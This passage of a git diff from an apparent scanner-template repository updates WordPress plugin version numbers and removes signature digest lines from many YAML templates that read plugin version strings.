http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 212 files changed, 12 insertions(+), 212 deletions(-) diff --git a/helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt b/helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt index e230c8396d..7d3cdbf0dd 100644 --- a/helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt +++ b/helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt @@ -1 +1 @@ -5.3.0 \ No newline at end of file +5.3.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt index 30a59a8b7a..958d30d86d 100644 --- a/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt +++ b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt @@ -1 +1 @@ -4.4 \ No newline at end of file +4.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/elementor.txt b/helpers/wordpress/plugins/elementor.txt index dbc9520ba4..d9b2ac520b 100644 --- a/helpers/wordpress/plugins/elementor.txt +++ b/helpers/wordpress/plugins/elementor.txt @@ -1 +1 @@ -3.22.2 \ No newline at end of file +3.22.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-listings-and-ads.txt b/helpers/wordpress/plugins/google-listings-and-ads.txt index 74500cee16..460b6fd404 100644 --- a/helpers/wordpress/plugins/google-listings-and-ads.txt +++ b/helpers/wordpress/plugins/google-listings-and-ads.txt @@ -1 +1 @@ -2.7.4 \ No newline at end of file +2.7.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/image-optimization.txt b/helpers/wordpress/plugins/image-optimization.txt index 589268e6fe..e21e727f96 100644 --- a/helpers/wordpress/plugins/image-optimization.txt +++ b/helpers/wordpress/plugins/image-optimization.txt @@ -1 +1 @@ -1.3.0 \ No newline at end of file +1.4.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/jetpack-boost.txt b/helpers/wordpress/plugins/jetpack-boost.txt index 5141b615b4..4b4ea1b688 100644 --- a/helpers/wordpress/plugins/jetpack-boost.txt +++ b/helpers/wordpress/plugins/jetpack-boost.txt @@ -1 +1 @@ -3.4.4 \ No newline at end of file +3.4.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/kadence-blocks.txt b/helpers/wordpress/plugins/kadence-blocks.txt index 0a0a9272fb..96395c56fd 100644 --- a/helpers/wordpress/plugins/kadence-blocks.txt +++ b/helpers/wordpress/plugins/kadence-blocks.txt @@ -1 +1 @@ -3.2.45 \ No newline at end of file +3.2.46 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pixelyoursite.txt b/helpers/wordpress/plugins/pixelyoursite.txt index bf196a8bdc..83cf670a19 100644 --- a/helpers/wordpress/plugins/pixelyoursite.txt +++ b/helpers/wordpress/plugins/pixelyoursite.txt @@ -1 +1 @@ -9.6.1.1 \ No newline at end of file +9.6.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/royal-elementor-addons.txt b/helpers/wordpress/plugins/royal-elementor-addons.txt index c746af1942..fcba8f8322 100644 --- a/helpers/wordpress/plugins/royal-elementor-addons.txt +++ b/helpers/wordpress/plugins/royal-elementor-addons.txt @@ -1 +1 @@ -1.3.977 \ No newline at end of file +1.3.978 \ No newline at end of file diff --git a/helpers/wordpress/plugins/seo-by-rank-math.txt b/helpers/wordpress/plugins/seo-by-rank-math.txt index 441cba7dba..eeb2820605 100644 --- a/helpers/wordpress/plugins/seo-by-rank-math.txt +++ b/helpers/wordpress/plugins/seo-by-rank-math.txt @@ -1 +1 @@ -1.0.221 \ No newline at end of file +1.0.222 \ No newline at end of file diff --git a/helpers/wordpress/plugins/translatepress-multilingual.txt b/helpers/wordpress/plugins/translatepress-multilingual.txt index 024a87fcf5..6533b66871 100644 --- a/helpers/wordpress/plugins/translatepress-multilingual.txt +++ b/helpers/wordpress/plugins/translatepress-multilingual.txt @@ -1 +1 @@ -2.7.9 \ No newline at end of file +2.8.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt index 6440e66468..8d9ff9ec94 100644 --- a/helpers/wordpress/plugins/wp-statistics.txt +++ b/helpers/wordpress/plugins/wp-statistics.txt @@ -1 +1 @@ -14.8 \ No newline at end of file +14.8.1 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 0009eaf953..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b849d5090750dac5c0d5b99549ca2bb002c8570eef31526f0a0547d796947dc3022100ae31ff2447f477b335b6e6bcd6c1f1b83f9303e597f3b4f35ebb8348a828aa48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 28e5918d1b..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205ac0ae43df190aba1e842c121fdb17b3a6d69f960262dda6687092607047b70f022100dd7662c5b43885dcf73d4edb4a143011e9cdc2a1c068ca3695fa9aa97500b1df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 951d47df48..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207d298eba34f2d535a0b756f146c7492366ff3291c78b40dadd77fa51130d967202204c43c55096e5e8fd2b4862bd42dddbeb668ec32e0fa91dcda3682f3646337a7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index b409b83dcc..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100deb7839964ad2ca5eb01b28f7f38b76d4dc79760196c895c6a3558712ee342610220479b213c066e5307a808e98fc6c1ba163d1b14dafe52c538bb8d3075860b2485:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 7227f5c629..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a06c84a6a1af34206e7fcf1a063495d83be6c394720a7a0bdf5c1456028aa798022100d76cfd55d4ae9a1d877ef9a2dfb8e882f99014a84c4c8b11cdbd1971aff511d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 91c84ac8cb..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206fb5046aca0e8557410522ec86132bd8b7536326d67d20fdbb6c50dafd21211202207da4247305f078cf884684163404bb83856241bd5fe7e0bc9d95357eb29b0e30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 6742223988..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d1145d7bb48a108664c81a1e48b664088e64014b04e24edbc5f7c2bc8fed91b1022100856e907569ab40e7ff6f25efb3ddf7dbc459094481b5dfe4e9e0b14c60cc500c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 1a7b8dece6..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220731a2738d29d5a63339bcb53fd01bbf4c53d926db878ee12591bd73e826a7fd7022100ffea9e3036e294f9bd1efbf3532fd0eec8ee13fd9c25a1b26fae0b95e2b0c333:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 69ff2b8b3b..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a021658de886a54b172986cdbffe0b3cae9df97b011f21950e56bd3f4f8b4f20022004432c652c0f0367a7eea7f6f04cf2e82ed155f8013ea4be8fb17b8357cadd10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 41cd659e0b..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fd5bacbf4e20f8a2348acd181a3e25feb8ed9a408c54792236bf02eb6812ca52022100a4ff42b40ed667c566d4568274c01935b1a58e58f6784f2e2fdd00355aaf00e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 6836307ed9..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022021a56a8238eb94b3eb7c73c8df32c5436356610a177a614a8de56138bbfc1ebe022100e6009a798c216e99cb78f9c2b920c2d4e253ce997750db6b3feeb5a02a35befe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index e989def353..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022064c8956bf3f0914fff0692279db58fcafd9bf5a384b1cd73b5a5848393b877360220181f1b98c7bbb9649ad19cd492c790a23c5f54e71ad466d864251a8e77b36c85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 7029bcd4b0..d462977581 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009f73fd8d09c1c781a858b17a3439bf90b1bd9da4cfdf635fded351c3214a18ae022100f59c4b6a8c497bb1f69f81e9e5c795d28b638ae1594a62de8117a81ca474bc99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index a89a6c6ee7..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200a4769ca176f51a1ca7c92a0ecbf3b2d168da013311414525b0b6d644c7ca523022070695a281ec1e6b86e510037634d95c7fd4975e824a416a6478f000bb4147b6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 8daa2a1f3e..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022013e2df583ef743275f2e3b08358d10bbc055b89a274a75ce728d6beb231a347a022100941b485006b787ec13693d0b8b1bb4e4a8ec04eed1c4af68a1141fde853d3d77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 3e7ae41769..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022017e6a7f6480c52b743c7202b80551cde6cf8999507439429982683cf1a5971fb022100859ec78e02cc0a2bb729aea6bedd8da34f641bac613597b2de7726dba696d6ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 7f10c4b9f4..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f1ec45e64ec7c48309974a411a18e545832890e929ce89b03a0aa840282c537c02210086ec08110eb4ef010d45e718bba4d13d53a563af6633669d16c4bb5b73e5866e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index ce7cdbed66..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b66f108601a78999064a7ae36e12a8138a220a26c4c689c62fdc18214500b8290221009a228741a19861b1a6bdaf16f72805a928204381f63fad4540e4be5d4e5c605f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 348ddc7de6..f8691caf0a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a665a44bb8377d8459df83103f46b2a4706e61296aad2da46936e6d7745febfc02204789e431c05be4f3cb17224fd2df92106505858efb3d7da05db795e3511cd021:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 2eb80ba488..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b02fa1c572363e32086e73e8cba8694c2b793173a9524ab51885a71ba84caecb022100969a3a0495830560343e6d25ef28dc907c7ebef2cef8bd1e3345c5e75a279a5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 608c9b7c81..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220616335a564b4d16bb61b738586289da69054371c2cdb3c862bff62a065ac915c022100a3c276c6a37b75e41ac77da42c827b6d965e1f4ba78395e25352a7e2afba4269:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index aaaf469744..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b1df1c2ba5b6d7b59bdfdd7f9c1ee1f386e69b655f2002406aec9d44ce13ab31022067d6f5b83e86e960815082c9e05fd685c14fa79af3e4320684fdf0f5bcc45c1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index f93a26ce25..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f18b07f0c9008e68095fa39ca4525af996132827ab2711619b6b61c81e7e69ba022100f41687ef7d0a21a37431f556d773a69e68879b839551bd764193768e93757438:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4635dae412..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210097183a62194df662f2af315d839ffd1ca23c9f694fab23913c3a7d2cb1b45437022100986fece02595f02f8f67a2117bf0f4e67248aa8268c34f55c9b23fce0c9f2d17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 6f7471930d..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202f4315b53d74d10e02316429b629fb2bf8d2c7aa3fb52593dc5b89f402a75f7902210087ce23bb71c8a1817ed9eeca8e45e381f02c03ec517ae758b54d8d43f0e8c09f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 78375fe4ee..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205ebdc35eb5667bf1d984c53b47c2477245b15eb0ef5b00927fdad0f6bdde44c0022100edbc20af98fc5f3c80864d53ed7bf5d97abae8327b1c933822de70aaf550acd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 6e9737a7f0..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f866bd0eb51a97afd82c4df15187f343a8aff6acbe40ec55d0baef1b2b6500db0220637e8bc5b98f5022a55865a9101dc6436a987ad4b32e036b96bde74be176465c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index f2559f1409..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204553ac5edf7f1948c0a0804cabdcba39b2f560126721bcac84ad00285840add502202b89142feabc00121cf39d66908fe874d9b60dadda7af341dc08034602f3ba23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 